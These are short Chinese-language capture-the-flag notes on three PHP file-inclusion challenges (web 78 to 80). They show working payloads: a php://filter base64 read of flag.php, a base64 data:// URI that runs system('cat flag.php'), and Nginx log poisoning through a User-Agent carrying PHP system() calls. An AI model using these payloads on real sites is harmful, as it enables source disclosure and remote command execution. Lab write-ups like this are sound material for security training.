web 78
在文件包含的题目中,php伪协议是非常常用的方法
读取php源码要加base64过滤器
?file=php://filter/convert.base64-encode/resource=flag.php
web 79
?file=data://text/plain;base64,<?php system('cat flag.php'); ?>
php给过滤掉了,用data协议执行PHP命令,并且php命令里有php也要base64
为?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
web80
日志包含
Nginx日志目录为/var/log/nginx/access.log
ua头中传入<?php system('ls');?>
<?php system('cat f10g.php');?>